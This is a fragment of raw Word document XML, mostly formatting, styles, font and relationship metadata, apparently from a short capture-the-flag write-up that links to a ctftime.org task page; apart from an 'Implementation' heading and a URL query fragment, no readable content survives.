                <w:color w:val="CCCCCC"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/&amp;quantity2=2&amp;quantity3=3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">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utlineLvl w:val="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="1F2328"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="2"/>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outlineLvl w:val="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="1F2328"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8">
            <w:pPr>
              <w:pStyle w:val="3"/>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rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D5EA8" w:rsidTr="005D5EA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D5EA8" w:rsidRDefault="005D5EA8" w:rsidP="005D5EA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F12C76" w:rsidRDefault="00F12C76" w:rsidP="006C0B77">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F12C76"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Verdana">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="CC"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00006FF" w:usb1="4000205B" w:usb2="00000010" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe U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5EA8"/>
    <w:rsid w:val="005D5EA8"/>
    <w:rsid w:val="006C0B77"/>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0ABE5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ABD2C3EA-B5E5-4DAD-8BEA-DE9D9DBD8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Cisco-Обычный"/>
    <w:qFormat/>
    <w:rsid w:val="005D5EA8"/>
    <w:pPr>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:sz w:val="18"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005D5EA8"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:x="137" w:y="116"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="1F2328"/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D5E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5D5EA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D5EA8"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="1F2328"/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="005D5EA8"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="005D5EA8"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D5EA8"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D5EA8"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D5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5D5EA8"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D5EA8"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="y2iqfc">
    <w:name w:val="y2iqfc"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005D5EA8"/>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="005D5EA8"/>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35904">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="67314645">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="340817083">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="795828771">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="122514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hatena.ne.jp/keyword/php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://d.hatena.ne.jp/keyword/%B4%C4%B6%AD%CA%D1%BF%F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hatena.ne.jp/keyword/%A5%BD%A1%BC%A5%B9%A5%B3%A1%BC%A5%C9"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ctftime.org/event/2338/tasks/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://d.hatena.ne.jp/keyword/%A5%A8%A5%B9"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252</Words>
  <Characters>1437</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SPecialiST RePack</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Назар Белютий</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Назар Белютий</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-28T21:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-28T21:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>